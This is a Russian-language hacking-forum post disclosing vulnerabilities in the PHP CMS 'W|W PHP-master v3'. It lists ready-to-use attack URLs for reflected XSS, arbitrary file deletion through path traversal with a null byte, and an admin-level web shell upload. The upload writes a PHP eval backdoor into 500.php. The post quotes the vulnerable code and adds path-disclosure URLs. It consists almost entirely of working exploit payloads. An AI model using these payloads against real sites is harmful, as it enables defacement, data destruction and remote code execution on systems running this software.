Форум АНТИЧАТ - W|W PHP-master v3

http://i057.radikal.ru/0904/bf/61d9e33305f1.png
скачать: http://www.phpedited.com/pages/dwld_file_op.php?kat=php-master&file=1224065184

xss
register_globals = On
/wwphpmaster/wap/tmpl/dw.php?url='>{xss}<!--
/wwphpmaster/wap/tmpl/hd.php?title=</title>{xss}&description=">{xss}&keywords=">{xss}&u rl='>{xss}
/wwphpmaster/wap/tmpl/err.php?action=badpass&error_color=>{xss}

удаление файлов
/wwphpmaster/wap/pages/kommf_del.php?kat=../../{filename}%00&file=b&entry=c
уязвимый код:

PHP код:


		
			
$kat=$_GET['kat'];

$file = $_GET['file'];

$entry = $_GET['entry'];



unlink ("../file/$kat/$file/komm/rec.$entry");

заливка шелла
нужны прив. админа
/wwphpmaster/wap/pages/kommf_edited.php?file=.&kat=.&entry=.
post: name=.&msg=.&kat=../../500.php%00&gb_e_mail=<?=isset($_GET['a'])?eval($_GET['a']):'';?>&gb_site.
уязвимый код:

PHP код:


		
			
if (($_SESSION['dostup']==101) || ($_SESSION['dostup']==102) || ($_SESSION['dostup']==103))

...

    $name=$_POST['name'];

    $msg=$_POST['msg'];

    $file_get=$_GET['file'];

    $name = trim($name);

    $kat = $_GET['kat'];

    $entry_get = $_GET['entry'];

    $em = $_POST['gb_e_mail'];

    $si = $_POST['gb_site'];

    ...

    $file = fopen("../file/$kat/$file_get/komm/rec.$entry_get","w+");

    fputs($file,$name."\n");

    fputs($file,$msg."\n");

    fputs($file,$pz_z."\n");

    fputs($file,$ses_z."\n");

    fputs($file,$em."\n");

    fputs($file,$si."\n");

    fclose($file);

шелл:
/wwphpmaster/500.php?a=phpinfo();

раскрытие пути
бесполезное)
/wwphpmaster/wap/tmpl/func.php
/wwphpmaster/wap/tmpl/conf.php
/wwphpmaster/wap/tmpl/rega.php
/wwphpmaster/wap/pages/dwld_file.php?kat=../../&start=9